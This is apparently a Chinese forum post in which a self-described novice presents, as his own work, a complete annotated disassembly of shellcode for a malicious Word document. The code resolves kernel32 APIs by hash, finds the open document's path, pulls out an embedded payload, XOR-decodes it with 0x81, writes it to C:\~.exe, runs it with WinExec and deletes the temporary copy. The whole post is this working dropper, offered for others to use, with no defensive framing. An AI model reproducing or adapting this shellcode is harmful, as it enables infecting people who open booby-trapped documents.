偶是新手,这个ShellCode也没有什么新意,如果说有的话,就在API的查找上还算有点优点。



00125B88    33DB            xor     ebx, ebx
00125B8A    81C6 00000200   add     esi, 20000
00125B90    46              inc     esi
00125B91    8B06            mov     eax, dword ptr [esi]
00125B93    3D 909064A1     cmp     eax, A1649090                    ;查找代码首位置
00125B98  ^ 75 F6           jnz     short 00125B90
00125B9A    43              inc     ebx
00125B9B    83FB 02         cmp     ebx, 2
00125B9E  ^ 75 F0           jnz     short 00125B90
00125BA0    FFE6            jmp     esi





00B8893E    90              nop
00B8893F    90              nop
00B88940    64:A1 30000000  mov     eax, dword ptr fs:[30]         ;取得kernel32.dll的基地址
00B88946    8B40 0C         mov     eax, dword ptr [eax+C]
00B88949    8B70 1C         mov     esi, dword ptr [eax+1C]
00B8894C    AD              lods    dword ptr [esi]
00B8894D    8B70 08         mov     esi, dword ptr [eax+8]         ; 7C800000h



00B88950    E9 6A020000     jmp     00B88BBF
00B88955    58              pop     eax                            ;把数据起始位置放入eax中
00B88956    81EC 00020000   sub     esp, 200
00B8895C    8BFC            mov     edi, esp
00B8895E    8B18            mov     ebx, dword ptr [eax]            ;  000A2000h
00B88960    895F 04         mov     dword ptr [edi+4], ebx
00B88963    8977 08         mov     dword ptr [edi+8], esi          ; Kernel32.dll
00B88966    83C0 04         add     eax, 4
00B88969    8947 0C         mov     dword ptr [edi+C], eax          ; "c:\~$" unicode  
00B8896C    83C0 0C         add     eax, 0C
00B8896F    8947 10         mov     dword ptr [edi+10], eax         ; "c:\~.exe"  unicode
00B88972    83C0 12         add     eax, 12
00B88975    8987 80000000   mov     dword ptr [edi+80], eax         ; "c:\~.exe"  ascii

;;;; 查找在堆栈中的文件名路径字符串


00B8897B    57              push    edi                          ;    保存edi
00B8897C    8BFC            mov     edi, esp
00B8897E    81F7 FFFF0000   xor     edi, 0FFFF
00B88984    4F              dec     edi
00B88985    4F              dec     edi
00B88986    4F              dec     edi
00B88987    4F              dec     edi
00B88988    813F 6F006300   cmp     dword ptr [edi], 63006F      ; "oc"  unicode
00B8898E  ^ 75 F7           jnz     short 00B88987
00B88990    4F              dec     edi
00B88991    4F              dec     edi
00B88992    4F              dec     edi
00B88993    4F              dec     edi
00B88994    813F 2E006400   cmp     dword ptr [edi], 64002E      ;  ".d"  unicode
00B8899A  ^ 75 EB           jnz     short 00B88987
00B8899C    68 C8000000     push    0C8
00B889A1    59              pop     ecx
00B889A2    8BF7            mov     esi, edi
00B889A4    4E              dec     esi
00B889A5    813E 3A005C00   cmp     dword ptr [esi], 5C003A      ; ":\" unicode
00B889AB    74 04           je      short 00B889B1
00B889AD  ^ E2 F5           loopd   short 00B889A4
00B889AF  ^ EB D6           jmp     short 00B88987
00B889B1    4E              dec     esi
00B889B2    4E              dec     esi                          ; 查找到完整的原doc文件名路径字符串  unicode型

00B889B3    5F              pop     edi                          ; 恢复edi数据

00B889B4    8977 14         mov     dword ptr [edi+14], esi      ; 将doc路径放入edi+14
00B889B7    FF77 08         push    dword ptr [edi+8]
00B889BA    68 EC97030C     push    0C0397EC
00B889BF    E8 A7010000     call    00B88B6B
00B889C4    8947 1C         mov     dword ptr [edi+1C], eax            ;GlobalAlloc
00B889C7    FF77 08         push    dword ptr [edi+8]
00B889CA    68 F622B97C     push    7CB922F6
00B889CF    E8 97010000     call    00B88B6B
00B889D4    8947 20         mov     dword ptr [edi+20], eax            ;GlobalFree
00B889D7    FF77 08         push    dword ptr [edi+8]
00B889DA    68 BB17007C     push    7C0017BB
00B889DF    E8 87010000     call    00B88B6B
00B889E4    8947 24         mov     dword ptr [edi+24], eax            ;CreateFileW
00B889E7    FF77 08         push    dword ptr [edi+8]
00B889EA    68 FB97FD0F     push    0FFD97FB
00B889EF    E8 77010000     call    00B88B6B
00B889F4    8947 28         mov     dword ptr [edi+28], eax            ;CloseHandle
00B889F7    FF77 08         push    dword ptr [edi+8]
00B889FA    68 1665FA10     push    10FA6516
00B889FF    E8 67010000     call    00B88B6B
00B88A04    8947 2C         mov     dword ptr [edi+2C], eax            ;ReadFile
00B88A07    FF77 08         push    dword ptr [edi+8]
00B88A0A    68 1F790AE8     push    E80A791F
00B88A0F    E8 57010000     call    00B88B6B
00B88A14    8947 30         mov     dword ptr [edi+30], eax            ;WriteFile
00B88A17    FF77 08         push    dword ptr [edi+8]
00B88A1A    68 3BB0FFC2     push    C2FFB03B
00B88A1F    E8 47010000     call    00B88B6B  
00B88A24    8947 34         mov     dword ptr [edi+34], eax            ;DeleteFileW
00B88A27    FF77 08         push    dword ptr [edi+8]
00B88A2A    68 AC08DA76     push    76DA08AC
00B88A2F    E8 37010000     call    00B88B6B
00B88A34    8947 38         mov     dword ptr [edi+38], eax            ;SetFilePointer
00B88A37    FF77 08         push    dword ptr [edi+8]
00B88A3A    68 98FE8A0E     push    0E8AFE98
00B88A3F    E8 27010000     call    00B88B6B
00B88A44    8947 3C         mov     dword ptr [edi+3C], eax            ;WinExec
00B88A47    FF77 08         push    dword ptr [edi+8]
00B88A4A    68 7489EC99     push    99EC8974
00B88A4F    E8 17010000     call    00B88B6B
00B88A54    8947 40         mov     dword ptr [edi+40], eax            ;CopyFileW
00B88A57    FF77 08         push    dword ptr [edi+8]
00B88A5A    68 7ED8E273     push    73E2D87E
00B88A5F    E8 07010000     call    00B88B6B
00B88A64    8947 44         mov     dword ptr [edi+44], eax            ;ExitProcess

;****************************************************************************

00B88A67    FF77 10         push    dword ptr [edi+10]                 ;C:\~.exe    unicode
00B88A6A    FF57 34         call    dword ptr [edi+34]                 ;DeleteFileW
00B88A6D    FF77 0C         push    dword ptr [edi+C]                  ; c:\~$
00B88A70    FF57 34         call    dword ptr [edi+34]                 ;DeleteFileW
00B88A73    6A 00           push    0
00B88A75    FF77 0C         push    dword ptr [edi+C]
00B88A78    FF77 14         push    dword ptr [edi+14]                  ;原doc文件路径   ~$
00B88A7B    FF57 40         call    dword ptr [edi+40]                 ;CopyFileW    原文件拷贝一份到C盘根目录下
00B88A7E    6A 00           push    0
00B88A80    68 80000000     push    80
00B88A85    6A 03           push    3
00B88A87    6A 00           push    0
00B88A89    6A 00           push    0
00B88A8B    68 00000080     push    80000000
00B88A90    FF77 0C         push    dword ptr [edi+C]
00B88A93    FF57 24         call    dword ptr [edi+24]               ; kernel32.CreateFileW  打开c:\~$
00B88A96    8947 60         mov     dword ptr [edi+60], eax
00B88A99    6A 02           push    2
00B88A9B    6A 00           push    0
00B88A9D    6A FC           push    -4
00B88A9F    FF77 60         push    dword ptr [edi+60]
00B88AA2    FF57 38         call    dword ptr [edi+38]               SetFilePointer      ;位置29FA5h
00B88AA5    6A 00           push    0
00B88AA7    8D9F A0000000   lea     ebx, dword ptr [edi+A0]
00B88AAD    53              push    ebx
00B88AAE    6A 04           push    4                                ;读取4个字节  值为 18BA5
00B88AB0    8D5F 04         lea     ebx, dword ptr [edi+4]
00B88AB3    53              push    ebx
00B88AB4    FF77 60         push    dword ptr [edi+60]
00B88AB7    FF57 2C         call    dword ptr [edi+2C]               ReadFile   刚才打开的c:\~$
00B88ABA    FF77 04         push    dword ptr [edi+4]                ; size 18BA5
00B88ABD    6A 40           push    40
00B88ABF    FF57 1C         call    dword ptr [edi+1C]               GlobalAlloc
00B88AC2    8947 5C         mov     dword ptr [edi+5C], eax
00B88AC5    8B5F 04         mov     ebx, dword ptr [edi+4]
00B88AC8    83C3 04         add     ebx, 4
00B88ACB    F7D3            not     ebx
00B88ACD    43              inc     ebx
00B88ACE    6A 02           push    2
00B88AD0    6A 00           push    0
00B88AD2    53              push    ebx
00B88AD3    FF77 60         push    dword ptr [edi+60]
00B88AD6    FF57 38         call    dword ptr [edi+38]              ; SetFilePointer  ;位置11400
00B88AD9    6A 00           push    0
00B88ADB    8D9F A0000000   lea     ebx, dword ptr [edi+A0]
00B88AE1    53              push    ebx
00B88AE2    FF77 04         push    dword ptr [edi+4]               ; size 18BA5
00B88AE5    FF77 5C         push    dword ptr [edi+5C]
00B88AE8    FF77 60         push    dword ptr [edi+60]
00B88AEB    FF57 2C         call    dword ptr [edi+2C]              ;ReadFile
00B88AEE    FF77 60         push    dword ptr [edi+60]
00B88AF1    FF57 28         call    dword ptr [edi+28]              ;CloseHandle   拷贝的 ~$ doc file
00B88AF4    8B47 04         mov     eax, dword ptr [edi+4]
00B88AF7    8B5F 5C         mov     ebx, dword ptr [edi+5C]

00B88AFA    8033 81         xor     byte ptr [ebx], 81             ; exe文件解密
00B88AFD    43              inc     ebx
00B88AFE    48              dec     eax
00B88AFF    83F8 00         cmp     eax, 0
00B88B02  ^ 75 F6           jnz     short 00B88AFA

00B88B04    6A 00           push    0
00B88B06    68 80000000     push    80
00B88B0B    6A 02           push    2
00B88B0D    6A 00           push    0
00B88B0F    6A 00           push    0
00B88B11    68 00000040     push    40000000
00B88B16    FF77 10         push    dword ptr [edi+10]
00B88B19    FF57 24         call    dword ptr [edi+24]                 ;CreateFileW  创建 c:\~.exe
00B88B1C    8947 64         mov     dword ptr [edi+64], eax
00B88B1F    6A 00           push    0
00B88B21    8D9F A0000000   lea     ebx, dword ptr [edi+A0]
00B88B27    53              push    ebx
00B88B28    FF77 04         push    dword ptr [edi+4]                   ; size 18BA5
00B88B2B    FF77 5C         push    dword ptr [edi+5C]
00B88B2E    50              push    eax
00B88B2F    FF57 30         call    dword ptr [edi+30]                  ;WriteFile
00B88B32    6A 00           push    0
00B88B34    8D9F A0000000   lea     ebx, dword ptr [edi+A0]
00B88B3A    53              push    ebx
00B88B3B    68 FF000000     push    0FF                               ; 
00B88B40    FF77 14         push    dword ptr [edi+14]                 ; 
00B88B43    FF77 64         push    dword ptr [edi+64]                 ; exe handle 
00B88B46    FF57 30         call    dword ptr [edi+30]                 ;WriteFile
00B88B49    FF77 64         push    dword ptr [edi+64]
00B88B4C    FF57 28         call    dword ptr [edi+28]                  ;CloseHandle   exe handle 
00B88B4F    FF77 5C         push    dword ptr [edi+5C]
00B88B52    FF57 20         call    dword ptr [edi+20]                  ;GlobalFree
00B88B55    6A 00           push    0
00B88B57    FFB7 80000000   push    dword ptr [edi+80]
00B88B5D    FF57 3C         call    dword ptr [edi+3C]                  ;WinExec
00B88B60    FF77 0C         push    dword ptr [edi+C]                   ; c:\~$
00B88B63    FF57 34         call    dword ptr [edi+34]                  ; DeleteFile
00B88B66    6A 00           push    0
00B88B68    FF57 44         call    dword ptr [edi+44]                  ;ExitProcess

;**********************************************************************
; 获取API入口地址的子函数
00B88B6B    55              push    ebp
00B88B6C    8BEC            mov     ebp, esp
00B88B6E    57              push    edi
00B88B6F    8B7D 08         mov     edi, dword ptr [ebp+8]
00B88B72    8B5D 0C         mov     ebx, dword ptr [ebp+C]            ;Kernel32.dll
00B88B75    56              push    esi
00B88B76    8B73 3C         mov     esi, dword ptr [ebx+3C]
00B88B79    8B741E 78       mov     esi, dword ptr [esi+ebx+78]
00B88B7D    03F3            add     esi, ebx
00B88B7F    56              push    esi
00B88B80    8B76 20         mov     esi, dword ptr [esi+20]
00B88B83    03F3            add     esi, ebx
00B88B85    33C9            xor     ecx, ecx
00B88B87    49              dec     ecx
00B88B88    41              inc     ecx
00B88B89    AD              lods    dword ptr [esi]
00B88B8A    03C3            add     eax, ebx
00B88B8C    56              push    esi
00B88B8D    33F6            xor     esi, esi
00B88B8F    0FBE10          movsx   edx, byte ptr [eax]
00B88B92    3AF2            cmp     dh, dl
00B88B94    74 08           je      short 00B88B9E
00B88B96    C1CE 0D         ror     esi, 0D
00B88B99    03F2            add     esi, edx
00B88B9B    40              inc     eax
00B88B9C  ^ EB F1           jmp     short 00B88B8F
00B88B9E    3BFE            cmp     edi, esi
00B88BA0    5E              pop     esi
00B88BA1  ^ 75 E5           jnz     short 00B88B88
00B88BA3    5A              pop     edx
00B88BA4    8BEB            mov     ebp, ebx
00B88BA6    8B5A 24         mov     ebx, dword ptr [edx+24]
00B88BA9    03DD            add     ebx, ebp
00B88BAB    66:8B0C4B       mov     cx, word ptr [ebx+ecx*2]
00B88BAF    8B5A 1C         mov     ebx, dword ptr [edx+1C]
00B88BB2    03DD            add     ebx, ebp
00B88BB4    8B048B          mov     eax, dword ptr [ebx+ecx*4]
00B88BB7    03C5            add     eax, ebp
00B88BB9    5E              pop     esi
00B88BBA    5F              pop     edi
00B88BBB    5D              pop     ebp
00B88BBC    C2 0800         retn    8
00B88BBF    E8 91FDFFFF     call    00B88955

; 下面的数据区

00B88BC4  00 20 0A 00 63 00 3A 00 5C 00 7E 00 24 00 00 00  . ..c.:.\.~.$...
00B88BD4  63 00 3A 00 5C 00 7E 00 2E 00 65 00 78 00 65 00  c.:.\.~...e.x.e.
00B88BE4  00 00 63 3A 5C 7E 2E 65 78 65                    ..c:\~.exe